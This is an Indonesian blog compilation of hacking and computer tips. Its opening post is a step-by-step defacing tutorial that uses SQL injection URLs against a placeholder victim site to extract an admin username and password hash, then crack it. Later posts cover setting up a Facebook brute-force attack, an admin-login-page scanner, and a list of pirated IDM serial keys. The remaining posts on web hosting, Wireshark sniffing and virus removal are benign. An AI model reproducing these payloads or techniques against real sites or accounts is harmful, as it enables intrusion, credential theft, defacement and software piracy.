Men-deface sebuah situs itu sebenarnya pekerjaan yang tidak terlalu sulit. Bahkan untuk sekelas Hacker pemula dapat melakukannya. Banyak sekali software yang dapat digunakan seperti Havij dan sejenisnya, dan tinggal mengikuti langkahnya, semuanya jadi mudah. Tinggal cari Dork-nya, kemudian identifikasi situs korban, dan eksekusi. Namun, ada dasar teknik tanpa software yang dapat kita lakukan. Teknik ini sebenarnya agak rumit, namun akan saya coba sederhanakan agar mudah dipraktekkan. Sebelumnya kita harus tahu dulu yang dimaksud defacing itu sebenarnya apa. Defacing adalah tindakan untuk mengganti file index.html atau index.php situs korban dengan file yang kita miliki. Ketika file index.html atau index.php situs korban kita ganti dengan index.html atau index.php yang kita inginkan, praktis publik akan hanya melihat index.html ataupun index.php yang kita miliki. Pengetahuan dasar yang harus dimiliki untuk melakukan defacing. SQL Injection (Untuk menganalisis loop website) Sandi Admin Shell Script (untuk mendapatkan Kontrol Admin) Sekarang, mari kita coba dengan cara yang paling sederhana agar mudah dipahami. Langkah pertama adalah dengan menguji kerentanan situs korban. Misalnya saja kita mengidentifkasi situs korban sebagai berikut: http://www.korban.com/news.php?id=5. Mari kita uji apakah situs tersebut aman atau mudah dideface. Lankah yang paling sederhana adalah dengan menamnahkan tanda kutipan (‘) ke akhir url dari situs korban. Dari contoh diatas, kemudian situs korban kita uji kerentanannya sebagai berikut: [code]http://www.korban.com/news.php?id=5 '[/code] jadi jika kita mendapatkan beberapa error seperti dibawah ini: “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…” atau sesuatu yang serupa yang berarti Situs rentan terhadap SQL injection. Langkah kedua, setelah kita tahu betul bahwa situs korban tersebut rentan untuk di deface, kita lakukan langkah penemuan kolom dengan menggunakan perintah Order by. Kita lakukan pengurutan nomer sampai mendapatkan error. Sebagai contoh: [code]http://www.korban.com/news.php?id=5 order by 1 / * <- tidak ada kesalahan http://www.korban.com/news.php?id=5 order by 2 / * <- tidak ada kesalahan http://www.korban.com/news.php?id=5 order by 3 / * <- tidak ada kesalahan http://www.korban.com/news.php?id=5 order by 4 / * <- error (kita mendapatkan pesan seperti kolom ini '4 Unknown 'dalam' klausa order 'atau sesuatu seperti itu) [/code] Dari hasil tersebut, berarti bahwa MySQL situs korban memiliki 3 kolom, karena pada saat diurutkan (incrementing) sampai langkah ke empat terdapat error. Langkah ketiga adalah dengan melakukan pengujian fungsi UNION. Dengan fungsi ini kita dapat memilih lebih banyak data dalam satu pernyataan sql. Contohnya sebagai berikut: [code]http://www.korban.com/news.php?id=5 union all select 1,2,3 (kita unionkan semua kolom yang sudah kita dapatkan dilangkah ke 2 diatas.) [/code] Catatan Penting: jika kita melihat beberapa nomor di layar monitor, yaitu 1 atau 2 atau 3 maka UNION bekerja. Langkah keempat adalah melakukan pengujian pada versi MySQL situs korban dengan perintah tambahan tanda minus dua kali (–). Jadinya seperti dibawah ini: [code]http://www.korban.com/news.php?id=5 union all select 1,2,3-- [/code] Kemudian amati output yang muncul di monitor. Misalnya saja di monitor muncul angka 2, segera kita ganti URL target dengan kode “@@version” atau “version()” atau kode tertentu seperti “4.1.33″ atau yang mirip dengan angka tersebut. URL target yang kita ganti adalah sebagai berikut: [code]http://www.korban.com/news.php?id=5 union all select 1,@@version,3-- [/code] Kemudian tekan enter (lakukan eksekusi). Jika kemudian dilayar monitor muncul error sebagai berikut: “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”, kemudian langkah selanjutnya adalah melakukan konversi dengan mengubah URL target sebagai berikut: [code]http://www.korban.com/news.php?id=5 union all select 1,convert(@@version using latin1),3 atau http://www.korban.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3[/code] Nah, versi dari MySQL situs korban dapat kita identifikasi. Langkah selanjutnya adalah dengan mendeteksi nama-nama dari setiap kolom tabel databse situs korban. Jika versi MySQL nya dibawah versi 5, kita dapat mengira-iranya. Misalnya saja kalau Platformnya wordpress pastilah nama tabelnya sekitar wp-content, wp-users, wp-options dan seterusnya. Dan nama kolom umumnya adalah: username, user_name, password, pass, passwd, pwd dll .. Coba kita lakukan pengecakan nama tabel dari MySQL situs korban dengan perintah dibawah ini: [code]http://www.korban.com/news.php?id=5 union all select 1,2,3 from admin [/code] Jika di monitor muncul angka misalnya “2″, maka berarti bahwa nama tabel tersebut adalah benar. Langkah selanjutnya adalah mengidentifikasi nama kolom dalam tabel admin. Dengan mengganti angka 2 dengan nama kolom yang kita inginkan. Perintahnya adalah sebagai berikut: [code]http://www.korban.com/news.php?id=5 union all select 1,username,3 from admin [/code] Jika muncul nama di layar monitor, maka itulah nama admin dari situs korban. Langkah selanjutnya adalah mengidentifikasi password admin. [code]http://www.korban.com/news.php?id=5 union all select 1,password,3 from admin [/code] Jika dilayar muncul kode (biasanya dalam bentuk enkripsi MD5), maka sukseslah injeksi MySQL kita untuk selanjutnya melakukan deface. Kode yang muncul dilayar, kemudian kita catat, dan lakukan dekripsi MD5 dengan Decrypt MD5 Generator yang banyak beredar di internet. Setelah nama admin kita dapet, password admin kita dapet, terus langkah selanjutnya ya terserah Anda. Tetapi perlu diingat, pengetahuan ini bukan digunakan untuk mengajarkan kejahatan. Tetapi dari semua langkah tersebut diatas dapat digunakan oleh webmaster situs bersangkutan untuk menguji kerentanan situsnya. Jika dicoba dengan cara ini kemudian berhasil, maka segera lakukan perbaikan. Jangan sampai terlambat.

Untuk membuat website .com yang dihosting anda harus benar-benar mempunyai pengetahuan pemrograman, karena kalau hanya menguasai HTML, maka hasilnya bisa jadi website yang menyedihkan dalam arti yang sesungguhnya. Kalau saudara ingin membuat website dari file yang bisa di hosting, maka setidaknya anda harus menguasai 3 hal: 1.Bahasa Pemrograman Tertentu seperti PHP 2.Penggunaan Software Editor File Web 3.Pengelolaan database seperty MySQL Belajar Bahasa Pemrograman Untuk Membuat Website Kalau saudara mau belajar, maka sebaiknya saudara membeli satu buku panduan di toko buku tentang PHP dan MySQL. Atau kalau saudara mau belajar sendiri saudara bisa mencoba website yang luar biasa W3SCHOOL (harus ada dasar bahasa inggris yang cukup). Lihat menu pembelajarannya di sidebar sebelah kiri. Belajar Program Pembuat Website Seperti Dreamweaver Menguasai bahasa pemrograman saja tidak berarti anda bisa membuat websitenya tanpa bantuan, jadi anda perlu belajar cara membuat website dengan menggunakan software. Salah satu software yang cukup umum digunakan adalah Adobe Dreamweaver. Saudara bisa membeli buku panduan Adobe Dreamweaver di toko-toko buku terdekat, karena panduan menggunakan buku jauh lebih terstruktur. Kalaupun saudara harus belajar dari dasar, tidak akan terlalu sulit. Dalam jangka waktu sekitar 2 minggu saudara sudah bisa merampungkan website PHP sederhana milik saudara.... Tapi kalau masalahnya ada di ekonomi yang lagi seret buat beli buku.... Bisa coba baca tutorial e-book di http://www.bgsu.edu/downloads/cio/file17760.pdf .... tapi bahasa inggris ya.... Bagaimana Kalau Malas Membuat Template Website Sendiri? Kalau saudara malas membuat template sendiri, maka saudara sebaiknya mendownload template PHP yang sudah jadi. Salah satu penyedia template PHP gratis adalah http://www.phpjabbers.com/free-website-templates.php. Anda bisa memilih beragam template pada situs ini.... tapi harus daftar dan login dulu kalau mau download.... Kalau saudara sudah dapat templatenya, maka silahkan edit templatenya dengan menggunakan Adobe Dreamweaver, jika diperlukan. Bagian terpenting dari sebuah website PHP adalah anda harus paham bagaimana cara menggunakan halaman PHP yang khusus untuk ADMIN, atau bagaimana cara mengubah struktur database MySQL sesuai kebutuhan anda.... Membeli Domain dan Hosting untuk Website Anda Saat ini sudah banyak sekali jasa hosting dan jual nama domain. Anda bisa melakukan browsing di Google untuk mendapatkan penawaran Hosting yang terbaik.... Banyaklah bertanya dengan Customer Service jika memang diperlukan..... Perhatikan juga syarat layanan dari hosting, karena terkadang mereka tidak menerima situs-situs tertentu, seperti perjudian, iklan baris, pornografi, dan lain sebagainya. Ini sangat penting sebelum anda terlanjur beli dan bermasalah di kemudian hari..... Kalau saudara belum pernah memesan domain dan hosting, maka ada 3 hal yang harus saudara pastikan tidak terlewatkan dari email penyedia hosting, yaitu: HOST FTP Username CPANEL, dan Password CPANEL Kalau saudara bingung, maka tanyakan saja ke CSnya lagi. Upload File Template Website PHP ke Hosting Untuk melakukan ini saudara bisa menggunakan software gratis FileZilla. Kalau belum punya saudara bisa mengunduhnya dari website resmi FileZilla. Kalau saudara adalah pengguna Windows, maka download file yang paling atas. Filezilla ini bisa anda gunakan untuk memindahkan file template website PHP tadi ke folder Public_HTML yang ada di hosting berdomain yang sudah anda beli. Yang perlu anda lakukan cuma connect, dan setelahnya anda cukup click and drag untuk memindahkan satu file. Kalau filenya banyak berarti anda harus membuka dulu folder Public_HTML dengan mengkliknya, setelah itu saudara bisa menyorot semua file yang hendak saudara pindahkan. Yang perlu anda lakukan hanyalah klik kanan dan pilih menu UPLOAD untuk memindahkan semua file tadi ke folder Public_HTML.... Mungkin untuk lebih memudahkan saudara memahami ini coba lihat video dari user Youtube DEN BAGUS di bawah ini.... http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=video&cd=1&cad=rja&uact=8&ved=0CBwQtwIwAA&url=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DMsFcryMv1zA&ei=Nq-jVPDdEMiNuATbtoHoCQ&usg=AFQjCNHSe6fM3RI0Trg0yRerKA21RopItg&sig2=S45-baGisenTuySNX4GQ_g Kalau file sudah saudara upload ke folder Public_HTML. Berarti semua orang sudah bisa mengakses file website yang sudah saudara kirimkan tadi di alamat domain .com yang sudah saudara bayar penggunaannya untuk jangka waktu tertentu.... Alasan Menggunakan Domain .COM? Tidak ada masalah SEO Friendly di sini.... Karena Google sama sekali tidak memberi keistimewaan pada satu jenis TLD tertentu. Alasan utama menggunakan .com adalah paling mudah diingat oleh pengguna.... Maksud saya seperti ini? Kalau saudara punya nama domain www.kucinglucu.net, maka biasanya saat ada pengunjung berusaha berkunjung balik maka mereka akan mengunjungi www.kucinglucu.com. Jadi tidak ada alasan teknis SEO yang aneh-aneh dalam masalah domain ini. RANGKUMAN Saudara bisa membuat website .com sendiri dengan membuat blog gratis yang diubah nama domainnya. Bisa juga dengan membuat file template sendiri dengan menggunakan software seperti Adobe Dreamweaver, lalu upload dengan menggunakan software FTP seperti FileZilla ke hosting berdomain .com yang sudah anda bayar penggunaannya dalam kurun waktu tertentu.

Tutorial kali ini akan membandingkan, penggunaan protocol http dan protocol https. Seperti kita ketahui protocol http adalah protocol web server yang menggunakan port 80. Kelemahan penggunaan protocol ini adalah data yang dikirim pada saat komunikasi di jaringan tidak dienkripsi. Sebagai akibatnya jika seseorang melakukan sniffing paket di jaringan maka dia bisa melihat data yang dikirim, termasuk data user dan password. Untuk itu tidak disarankan menggunakan protocol http (port 80) untuk komunikasi di web berupa transaksi yang sifatnya rahasia. Berikut ini mensimulasikan pengiriman data user dan password menggunakan protocol http dibandingkan menggunakan protocol https (443) Memulai Capture Packet Instal wireshark yang bisa di download di http://www.wireshark.org/. Wireshark ini adalah software yang bisa digunakan untuk mengcapture paket yang lewat di suatu komputer. Tools ini sangat berguna untuk analisis paket dan jaringan. Setelah diinstal wireshark dijalankan (bisa berjalan di berbagai platform Linux, Window, dan Mac) Dari menu bar Wireshark, click Capture, Interfaces. Pada kotak “Wireshark: Capture Interfaces”, cari Interface dengan alamat IP address yang akan dicapture. Pada contoh berikut adalah yang paling atas. Interface harus memerlihatkan beberapa paket melaluinya, dikarenakan interface tersebut terkoneksi ke jaringan. Click tombol Start pada baris interface. Maka akan nampak yang ditangkap dan bisa discroll, seperti pada gambar di bawah ini. Setiap paket dikirim dari atau menuju komputer kita. Akan tetapi juga memperlihatkan banyak informasi yang bisa diketahui. Mengirim Test Password ke Wikipedia Kita coba membuka halaman website http menggunakan browser (bisa browser apa saja). Kemudian kita coba buka situs wikipedia.com (bisa situs lain yang penting ada loginnya) Pada screen kanan atas, click “Log In“. Masukan nama anda (missal:joe) dan masukan juga Password (misal topsecretpassword) . (Masukan saja user dan password, sembarang). Click tombol “Log In“. Jika ada pesan yang menanyakan apakah password akan diingat, click “Not Now”. Pada jendela Wireshark, box, click Capture, Stop Mengobservasi Password di Wireshark Pada jendela Wireshark, box, click Edit, “Find Packet“. Pada kotak “Wireshark: Find Packet”, click tombol String. Masukan string yang dicari (misalkan nama kalian yang dimasukan di kotak password, atau jika tidak dapat misalnya kata login di kotak search), seperti terlihat di sebelah kanan. Click Find. Wireshark akan mencari teks tersebut. Akan tertuju ke packet yang menggunakan Protocol HTTP, seperti terlihat di bawah ini. Pada bagian bawahjendela Wireshark window packet data mentah terlihat dalam bentuk hexadecimal di sisi kiri dan ASCII di sisi kanan. Password akan Nampak di sisi kanan, Jadi bisa dibayangkan jika pada saat kita mengakses suatu halaman login, di jaringan public. Bisa saja ada orang lain yang menggunakan tools sniffing seperti ettercap, yang mencapture paket data kita.ok sekian dulu ...wassalam. semoga bermanfaat.....

oke kali ini saya mau berbagi hack facebook dengan bruteforce , yang namanya brute force menebak password :v :p

Oke langsung saja ya daripada kelamaan intro :D  
Bahan bahan :  
Python [ buat yang pake windows. kalo udah di install ya skip ke langkah berikutnya] 
Mechanize
Tools BruteForce

Langkah Langkah :
1. Install Python , kalo ini gampang tinggal klik klik :v
2. Install Mechanize.
Caranya ,

1. ekstrak file .zip yang kalian download diatas. 
2. Untuk memudahkan ekstrak saja di dir C:
3. Lalu buka CMD , ketik cd/mechanize-0.2.5 (karena tadi ngekstrak file nya di direktori itu) 
4. kalo sudah , ketik setup.py install . Tunggu proses install selesai.

 

Assalamuallaikum ^_^
sorry nih kalau jarang post and jarang ketemu di fb :v
hihihi lagi di tantang sm cewek mainan windows movie meker hehe :v

kali ini mau share tools buat nyari admin login website, tapi versi python . Biasanya kan ada tuh yang pake accunetix, lebih mantep, karena sistemnya crawl, namun kalo situsnya udah diberi htaccess, accunetix gak bakal work . Makanya harus dicoba per url. Penampakanya seperti ini :




Untuk download bisa klik disini :
Download Python Admin Login Scanner
Cara pengunaannya cukup buka ake cmd, masukkan url , plih tipe web nya , scan.....
Simpan dengan ekstensi .py
Filenya udah ane edit dari versi aslinya , dengan penambahan beberapa dir admin login terutama lokomedia :)

Sekian dan semoga bermanfaat .  

Assalamuallaikum :)
kali ini saya mau share tutorial bikin folder tanpa nama :D 
oke langsung saja
anda menggunakan Laptop/Netbook maka terlebih dahulu aktifkan NumLk dengan cara tekan Fn + NumLk (F11). Cara membuat folder tanpa nama :

1. Buat Folder baru, Klik kanan -> New -> Folder
2. Hapus tulisan New Folder
3. Tekan Alt + 255 maka folder tanpa nama sudah berhasil dibuat
4. Tekan Enter

Selamat mencoba dan semoga berhasil ^_^
saya di berhasil :D trus di hidden dah isi file2 anu :v biar gak di curigai orang lain :v
wkwkwks :p

Assalamuallaikum ^_^
kali ini saya mau share tutorial serial number IDM ^_^
dan cara nya :D
oke langsung saja

Serial Number Internet Download Manager 6.15

S/N: XAGZU-SJ0FO-BDLTK-B3C3V
S/N: Y5LUM-NFE0Q-GJR2L-5B86I

Serial Number Internet Download Manager 6.15.6

S/N: 4BTJF-DYNIL-LD8CN-MM8X5
S/N: Y5LUM-NFE0Q-GJR2L-5B86I
S/N: XAGZU-SJ0FO-BDLTK-B3C3V

Serial Number Internet Download Manager 6.17.3 

S/N: RLDGN-OV9WU-5W589-6VZH1
S/N: HUDWE-UO689-6D27B-YM28M
S/N: 398ND-QNAGY-CMMZU-ZPI39
S/N: UK3DV-E0MNW-MLQYX-GENA1
S/N: W3J5U-8U66N-D0B9M-54SLM
S/N: EC0Q6-QN7UH-5S3JB-YZMEK
S/N: GZLJY-X50S3-0S20D-NFRF9
S/N: UVQW0-X54FE-QW35Q-SNZF5
S/N: FJJTJ-J0FLF-QCVBK-A287M

Lalu matikan Internet terlebih dahulu lalu registrasi 

isi dengan S/N Diatas seterah pake satu aja , matikan koneksi internet (disconect) dahulu baru memasukan serial ... cara ini berhasil untuk mengelabui IDM Official :v

Assalamuallaikum :)
kali ini saya mau berbagi cara hapus virus Autorun.inf 
virus ini sangat amat menjengkel kan bagi saya tentunya :)

tapi tenang saya ada trick untuk menghapusnya :)

Oke sob langsung aj kita mulai..
 
Pertama :
Sobat2 harus punya aplikasi Unlocker, Download Aplikasinya DISINI
Buat yg belum punya Smadav bisa Download dulu DISINI atau yang lain. Buat yang sudah terinstal Smadav ya ga perlu Download lagi.. klo saya pake Smadav 9.2
Install Unlocker dan Smadavnya, lalu buka Smadav tp jgn di pakai dulu..
Kedua :
Cara menghapus Virus Autorun.inf Menggunakan Unlocker,
1. Untuk Windows 7:
Sobat buka Windows Explore, trus buka drive yg terdapat Virus Autorun.inf nya (contoh drive: C:,D:,F:,dll).
Lalu ke menu di kiri atas klik Organize > pilih Folder and Search Option
Pada Folder Option sobat klik View > lalu pilih opsi: Show Hidden Files, Folders, and Drives.
Kemudian Centang Opsi: Hide protected operating system files (recommended) Lalu pilih apply / Ok.
Setelah itu kita hapus si autorun virus caranya;
Cari dan pilih file yang bernama autorun.inf (virus) klik kanan » Pilih unlocker > Disitu/bawah terlihat no action ubah menjadi Delete klik unlocker all, terus ulangi sampai benar2 habis. Delete Klik Ok.
2. Untuk Windows XP :
Tool -Folder Options – Pilih tab View – Pilih show hidden files and folder. Dan hilangkan centang. Hide Protected operating system files (Recommended). Klik Ok
– Untuk menghapus virus metodenya tetap sama.
Nah gimana sobat2 berhasil ga??
Tips untuk Mencegah Virus Autorun balik lagi :
Mungkin banyak yang mengabaikan fitur dari smadav salah satunya smad lock. Smad lock berfungsi sebagai mengunci Harddisk atau Flashdisk supaya virus autorun.inf tidak dapat menyerang. Langsung saja Setelah menghapus memakai unlocker. Sobat harus cepat2,
 
Contoh Gambar :



Selesai nanti di Harddisk / Flasdisk sobat akan terdapat folder yang bernama autorun.inf. 
Jangan dihapus sob jika berupa folder itulah yang mengunci Harddisk / Flasdisk sobat dari serangan virus autorun.inf, sekarang menjadi aman dari virus autorun.inf gak bakal bisa masuk lagi (kecuali sengaja dimasukkan) hehee.. 
dan menyerang Hard drive sobat2. Silahkan scan Harddisk / Flasdisk sobat menggunakan smadav untuk menghilangkan sisa virus yang meninggalkan ekstensi *.pif.
Note : Setelah selesai menghapus dan mengunci harddrive dari serangan virus autorun.inf jangan lupa untuk mengembalikan pengaturan Hidden file tadi.
Wokee sob, sekian tips mengenai virus autorun.inf kali ini,

heheh kita lawan aja nih virus dari pada nyerang :D
hahah :v /
dan kita menang :)